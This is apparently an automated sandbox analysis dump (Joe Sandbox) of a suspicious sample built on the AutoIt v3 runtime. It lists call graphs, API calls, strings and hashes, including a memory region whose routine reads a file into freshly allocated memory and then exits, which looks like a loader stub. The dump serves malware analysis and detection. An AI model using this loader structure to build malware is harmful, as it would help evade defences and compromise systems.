86921->86945 86924 40e5e0 86926 40e5f1 FreeLibrary 86924->86926 86927 40e5f4 86924->86927 86925 40e5dd FreeLibrary 86925->86924 86926->86927 86927->86891 86929 40e60b 86928->86929 86930 40c740 74 API calls 86929->86930 86931 40e4c2 86930->86931 86932 40e620 86931->86932 86933 40e62a 86932->86933 86934 42ac93 86933->86934 86935 40c740 74 API calls 86933->86935 86936 40e4ce 86935->86936 86936->86913 86937 40ee70 86936->86937 86938 40e551 86937->86938 86939 40ee76 LoadLibraryA 86937->86939 86938->86915 86938->86916 86939->86938 86940 40ee87 GetProcAddress 86939->86940 86940->86938 86942 40e5bf 86941->86942 86943 40eee6 LoadLibraryA 86941->86943 86942->86914 86942->86921 86943->86942 86944 40eef7 GetProcAddress 86943->86944 86944->86942 86949 40eec0 LoadLibraryA GetProcAddress 86945->86949 86947 40e5d3 GetNativeSystemInfo 86947->86924 86947->86925 86948->86916 86949->86947 86950 4549888 86964 45474d8 86950->86964 86952 4549953 86967 4549778 86952->86967 86954 454997c CreateFileW 86956 45499d0 86954->86956 86957 45499cb 86954->86957 86956->86957 86958 45499e7 VirtualAlloc 86956->86958 86958->86957 86959 4549a05 ReadFile 86958->86959 86959->86957 86960 4549a20 86959->86960 86961 4548778 13 API calls 86960->86961 86963 4549a53 86961->86963 86962 4549a76 ExitProcess 86962->86957 86963->86962 86970 454a978 GetPEB 86964->86970 86966 4547b63 86966->86952 86968 4549781 Sleep 86967->86968 86969 454978f 86968->86969 86971 454a9a2 86970->86971 86971->86966 86972 42e89e 86979 40c000 86972->86979 86974 42e8ac 86975 409a40 164 API calls 86974->86975 86976 42e8ca 86975->86976 86990 44b92e VariantClear 86976->86990 86978 42f3ae 86980 40c014 86979->86980 86981 40c007 86979->86981 86983 40c01a 86980->86983 86984 40c02c 86980->86984 86991 409210 VariantClear 86981->86991 86992 409210 VariantClear 86983->86992 86987 41171a 74 API calls 86984->86987 86985 40c00f 86985->86974 86989 40c033 86987->86989 86988 40c023 86988->86974 86989->86974 86990->86978 86991->86985 86992->86988
                                                                                                                APIs
                                                                                                                • CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharUpper
                                                                                                                • String ID: 0vH$4RH
                                                                                                                • API String ID: 3964851224-2085553193
                                                                                                                • Opcode ID: 46287a7bb28814e7acc9e24331a329a483cab8fdfa0313037193f1b97064f243
                                                                                                                • Instruction ID: 7c8f52bff4b3ea9a641e6aac08ab5e1c8beb32691f0f21fab5f23224d73a3634
                                                                                                                • Opcode Fuzzy Hash: 46287a7bb28814e7acc9e24331a329a483cab8fdfa0313037193f1b97064f243
                                                                                                                • Instruction Fuzzy Hash: 34238170A043109FD724DF25D480A6BB7E1BF89304F54896EE84A9B391D739EC46CB9B

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetVersionExW.KERNEL32 ref: 0040E495
                                                                                                                • GetCurrentProcess.KERNEL32(?,?), ref: 0040E560
                                                                                                                • GetNativeSystemInfo.KERNELBASE(?,?), ref: 0040E5D3
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0040E5DE
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0040E5F2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion
                                                                                                                • String ID: pMH
                                                                                                                • API String ID: 3079510601-2522892712
                                                                                                                • Opcode ID: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                                                                                                                • Instruction ID: 31d199e0849a18b4fe3a20375a839c17b1fda7a8e5a404adfed2e153d323e8b3
                                                                                                                • Opcode Fuzzy Hash: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                                                                                                                • Instruction Fuzzy Hash: D4612E71508792AEC311CB69C44425ABFE07B6A308F580E6EE48483A42D379E568C7AB

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EB55,0040D86E), ref: 0040EB7B
                                                                                                                • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EB8D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: IsThemeActive$uxtheme.dll
                                                                                                                • API String ID: 2574300362-3542929980
                                                                                                                • Opcode ID: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                                                                                                                • Instruction ID: e8120cabfd18d8fe06d2f96d8b82b2b5a4bcadd10797c678d2963416b1e4c3b8
                                                                                                                • Opcode Fuzzy Hash: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                                                                                                                • Instruction Fuzzy Hash: 05D0C9B49407039AD7306F72C918B0A7BE4AB50342F204C3EF996A1694DBBCD0508B28
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00409A40: CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                                                                                • Sleep.KERNEL32(0000000A), ref: 00409870
                                                                                                                • timeGetTime.WINMM ref: 00409880
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharSleepTimeUppertime
                                                                                                                • String ID:
                                                                                                                • API String ID: 2141449944-0
                                                                                                                • Opcode ID: da6b74c52f7fd8fa7285d44dc66266380a963bd06260c315e722df216112258b
                                                                                                                • Instruction ID: 79dfb759edd1749a95aa3438e3198289cebfc990e9c1b7da565b255c5aac8c6d
                                                                                                                • Opcode Fuzzy Hash: da6b74c52f7fd8fa7285d44dc66266380a963bd06260c315e722df216112258b
                                                                                                                • Instruction Fuzzy Hash: D422F171608342ABC724DF64C984BABB7A0BF89304F14492FE54997392D77CEC45CB9A

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetSysColorBrush.USER32 ref: 00410326
                                                                                                                • RegisterClassExW.USER32 ref: 00410359
                                                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                                                                                                                • InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                                                                                                                • LoadIconW.USER32(00400000,000000A9), ref: 004103B1
                                                                                                                • ImageList_ReplaceIcon.COMCTL32(00A000D8,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                • API String ID: 2914291525-1005189915
                                                                                                                • Opcode ID: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                                                                                                                • Instruction ID: c8c51aded5b6d43d10953d3ded2c15c159303f3bf9a059b11759766ceadcbce4
                                                                                                                • Opcode Fuzzy Hash: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                                                                                                                • Instruction Fuzzy Hash: 9F2129B4518301AFD340DF64D888B4EBFF4FB89704F008A2EF685962A0E7B58144CF5A

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 004101F9
                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00410209
                                                                                                                • LoadIconW.USER32(?,00000063), ref: 0041021F
                                                                                                                • LoadIconW.USER32(?,000000A4), ref: 00410232
                                                                                                                • LoadIconW.USER32(?,000000A2), ref: 00410245
                                                                                                                • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
                                                                                                                • RegisterClassExW.USER32 ref: 004102C6
                                                                                                                  • Part of subcall function 004102F0: GetSysColorBrush.USER32 ref: 00410326
                                                                                                                  • Part of subcall function 004102F0: RegisterClassExW.USER32 ref: 00410359
                                                                                                                  • Part of subcall function 004102F0: RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                                                                                                                  • Part of subcall function 004102F0: InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                                                                                                                  • Part of subcall function 004102F0: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                                                                                                                  • Part of subcall function 004102F0: LoadIconW.USER32(00400000,000000A9), ref: 004103B1
                                                                                                                  • Part of subcall function 004102F0: ImageList_ReplaceIcon.COMCTL32(00A000D8,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                • String ID: #$0$PGH
                                                                                                                • API String ID: 423443420-3673556320
                                                                                                                • Opcode ID: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                                                                                                                • Instruction ID: 6be78a7d21e01e6533eb66d2751721d4fd39e3055bf34e10baa21603515e7cea
                                                                                                                • Opcode Fuzzy Hash: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                                                                                                                • Instruction Fuzzy Hash: 60216DB5A18300AFD310CF59EC84A4A7FE4FB99710F00497FF648972A0D7B599408B99
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNELBASE(00000080,00000000,00000080,0000000C,00000001,00000080,00000000,00000109,00000000,00000109), ref: 004257F3
                                                                                                                • CreateFileW.KERNEL32(00000080,7FFFFFFF,00000001,0000000C,00000001,00000080,00000000), ref: 0042582C
                                                                                                                • GetLastError.KERNEL32 ref: 00425851
                                                                                                                • GetFileType.KERNELBASE(?), ref: 0042586D
                                                                                                                • GetLastError.KERNEL32 ref: 00425892
                                                                                                                • CloseHandle.KERNEL32(?), ref: 004258A4
                                                                                                                • CloseHandle.KERNEL32(?), ref: 00425C6A
                                                                                                                • CreateFileW.KERNEL32(00000080,00000000,00000001,0000000C,00000003,00000080,00000000), ref: 00425C87
                                                                                                                • GetLastError.KERNEL32 ref: 00425C92
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$CreateErrorLast$CloseHandle$Type
                                                                                                                • String ID:
                                                                                                                • API String ID: 352418905-0
                                                                                                                • Opcode ID: 9a2842c33dd42d113f273929bf8fd8cb84c1a2513e7f56b17b889415b9c929d6
                                                                                                                • Instruction ID: 669c70fe02d08c48a4bfc23b5c295140071241b72d0cac454048e7f20503c7df
                                                                                                                • Opcode Fuzzy Hash: 9a2842c33dd42d113f273929bf8fd8cb84c1a2513e7f56b17b889415b9c929d6
                                                                                                                • Instruction Fuzzy Hash: DF222371A00A299BDF219F68E8857AE7BB1EF01314FA4066AE451D7391D33D8D80CB59
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ec6185bb95033948424997075615cd394999d7b3352a51c3c84c5f176d9edcdf
                                                                                                                • Instruction ID: 60237bb9b030d907ca0bd1bf58dcbb3909e656aee1947051e473b0785f795cf0
                                                                                                                • Opcode Fuzzy Hash: ec6185bb95033948424997075615cd394999d7b3352a51c3c84c5f176d9edcdf
                                                                                                                • Instruction Fuzzy Hash: E112A4789042869FDB21DF6AC8847EA7BF0BF06304F14459FED6287292D37899C1CB59

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 1555 410b90-410cf1 call 425210 call 41171a GetModuleFileNameW call 413db0 call 413dfc call 413e3c call 41171a call 411691 RegOpenKeyExW 1570 429bc3-429bec RegQueryValueExW 1555->1570 1571 410cf7-410d03 1555->1571 1572 429bf2-429c18 1570->1572 1573 429cd9-429cde RegCloseKey 1570->1573 1574 429c1f-429c31 1572->1574 1575 429c33-429c37 1574->1575 1576 429c50-429c5f call 4112d5 1574->1576 1575->1576 1577 429c39-429c48 call 411663 1575->1577 1582 429c61-429c74 call 4112d5 1576->1582 1583 429c88-429cd2 call 41171a call 41326a 1576->1583 1585 429c4b-429c4e 1577->1585 1582->1583 1590 429c76-429c85 call 411663 1582->1590 1583->1585 1594 429cd8 1583->1594 1585->1574 1590->1583 1594->1573
                                                                                                                APIs
                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00410C44
                                                                                                                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00020019,?), ref: 00410CE9
                                                                                                                • RegQueryValueExW.ADVAPI32 ref: 00429BE4
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00429CDE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseFileModuleNameOpenQueryValue
                                                                                                                • String ID: Include$Software\AutoIt v3\AutoIt$\
                                                                                                                • API String ID: 3617018055-2276155026
                                                                                                                • Opcode ID: d7f6643cad26fd3001d91627fc5ef1af4f656d40d4c5ca14c02d7ab544e78cf5
                                                                                                                • Instruction ID: ef4714a7fd58501e566ba693257e1f196c1b97611c18bc9c35ab262cfa7686fb
                                                                                                                • Opcode Fuzzy Hash: d7f6643cad26fd3001d91627fc5ef1af4f656d40d4c5ca14c02d7ab544e78cf5
                                                                                                                • Instruction Fuzzy Hash: B961B3B1508340DFC300EF65EC8599BBBE8FB99704F44882EF544C3261EBB59948CB5A

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 1595 4549ac8-4549b76 call 45474d8 1598 4549b7d-4549ba3 call 454a9d8 CreateFileW 1595->1598 1601 4549ba5 1598->1601 1602 4549baa-4549bba 1598->1602 1603 4549cf5-4549cf9 1601->1603 1610 4549bc1-4549bdb VirtualAlloc 1602->1610 1611 4549bbc 1602->1611 1604 4549d3b-4549d3e 1603->1604 1605 4549cfb-4549cff 1603->1605 1607 4549d41-4549d48 1604->1607 1608 4549d01-4549d04 1605->1608 1609 4549d0b-4549d0f 1605->1609 1614 4549d9d-4549db2 1607->1614 1615 4549d4a-4549d55 1607->1615 1608->1609 1616 4549d11-4549d1b 1609->1616 1617 4549d1f-4549d23 1609->1617 1612 4549be2-4549bf9 ReadFile 1610->1612 1613 4549bdd 1610->1613 1611->1603 1618 4549c00-4549c40 VirtualAlloc 1612->1618 1619 4549bfb 1612->1619 1613->1603 1622 4549db4-4549dbf VirtualFree 1614->1622 1623 4549dc2-4549dca 1614->1623 1620 4549d57 1615->1620 1621 4549d59-4549d65 1615->1621 1616->1617 1624 4549d25-4549d2f 1617->1624 1625 4549d33 1617->1625 1626 4549c47-4549c62 call 454ac28 1618->1626 1627 4549c42 1618->1627 1619->1603 1620->1614 1628 4549d67-4549d77 1621->1628 1629 4549d79-4549d85 1621->1629 1622->1623 1624->1625 1625->1604 1635 4549c6d-4549c77 1626->1635 1627->1603 1631 4549d9b 1628->1631 1632 4549d87-4549d90 1629->1632 1633 4549d92-4549d98 1629->1633 1631->1607 1632->1631 1633->1631 1636 4549c79-4549ca8 call 454ac28 1635->1636 1637 4549caa-4549cbe call 454aa38 1635->1637 1636->1635 1642 4549cc0 1637->1642 1643 4549cc2-4549cc6 1637->1643 1642->1603 1645 4549cd2-4549cd6 1643->1645 1646 4549cc8-4549ccc CloseHandle 1643->1646 1647 4549ce6-4549cef 1645->1647 1648 4549cd8-4549ce3 VirtualFree 1645->1648 1646->1645 1647->1598 1647->1603 1648->1647
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 04549B99
                                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 04549DBF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4331374754.0000000004547000.00000040.00000020.00020000.00000000.sdmp, Offset: 04547000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4547000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFileFreeVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 204039940-0
                                                                                                                • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                                                                • Instruction ID: 453a3964fff1a71851e8c90c75ff83261139c531c70e295ad5b2ee7449ab46b4
                                                                                                                • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                                                                • Instruction Fuzzy Hash: 85A13BB0E00209EBDB14CFA4D885BEEB7B5FF88308F208559E505BB284D775AA40DF54

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 1649 401230-40123b 1650 401241-401272 call 4131f0 call 401be0 1649->1650 1651 4012c5-4012cd 1649->1651 1656 401274-401292 1650->1656 1657 4012ae-4012bf KillTimer SetTimer 1650->1657 1658 42aa61-42aa67 1656->1658 1659 401298-40129c 1656->1659 1657->1651 1662 42aa8b-42aaa7 Shell_NotifyIconW 1658->1662 1663 42aa69-42aa86 Shell_NotifyIconW 1658->1663 1660 4012a2-4012a8 1659->1660 1661 42aaac-42aab3 1659->1661 1660->1657 1664 42aaf8-42ab15 Shell_NotifyIconW 1660->1664 1665 42aad7-42aaf3 Shell_NotifyIconW 1661->1665 1666 42aab5-42aad2 Shell_NotifyIconW 1661->1666 1662->1657 1663->1657 1664->1657 1665->1657 1666->1657
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00401BE0: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
                                                                                                                • KillTimer.USER32(?,?), ref: 004012B0
                                                                                                                • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012BF
                                                                                                                • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AA80
                                                                                                                • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AACC
                                                                                                                • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AB0F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconNotifyShell_$Timer$Kill
                                                                                                                • String ID:
                                                                                                                • API String ID: 3970887597-0
                                                                                                                • Opcode ID: a7115ab057bf29602ed6c82bb799c717f5f73d3545905a596edaeb05fb95c8cc
                                                                                                                • Instruction ID: 78dbdb20408675f5dda5a176dd8a03fc230073daf987e80dd157250a536ae6f7
                                                                                                                • Opcode Fuzzy Hash: a7115ab057bf29602ed6c82bb799c717f5f73d3545905a596edaeb05fb95c8cc
                                                                                                                • Instruction Fuzzy Hash: 56319670609642BFD319CB24D544B9BFBE8BF85304F04856EF488A3251C7789A19D7AB

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 1667 4103e0-410461 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                APIs
                                                                                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
                                                                                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
                                                                                                                • ShowWindow.USER32(?,00000000), ref: 00410454
                                                                                                                • ShowWindow.USER32(?,00000000), ref: 0041045E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$CreateShow
                                                                                                                • String ID: AutoIt v3$edit
                                                                                                                • API String ID: 1584632944-3779509399
                                                                                                                • Opcode ID: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                                                                                                                • Instruction ID: daa3d4afae2654ee996124117597f48fa5c574a0ac4b96d00400a8ba476d7f73
                                                                                                                • Opcode Fuzzy Hash: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                                                                                                                • Instruction Fuzzy Hash: F3F0A975BE4310BAF6609754AC43F592B59A765F00F3445ABB700BF1D0D6E478408B9C

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 1668 4549888-45499c9 call 45474d8 call 4549778 CreateFileW 1675 45499d0-45499e0 1668->1675 1676 45499cb 1668->1676 1679 45499e7-4549a01 VirtualAlloc 1675->1679 1680 45499e2 1675->1680 1677 4549a80-4549a85 1676->1677 1681 4549a05-4549a1c ReadFile 1679->1681 1682 4549a03 1679->1682 1680->1677 1683 4549a20-4549a5a call 45497b8 call 4548778 1681->1683 1684 4549a1e 1681->1684 1682->1677 1689 4549a76-4549a7e ExitProcess 1683->1689 1690 4549a5c-4549a71 call 4549808 1683->1690 1684->1677 1689->1677 1690->1689
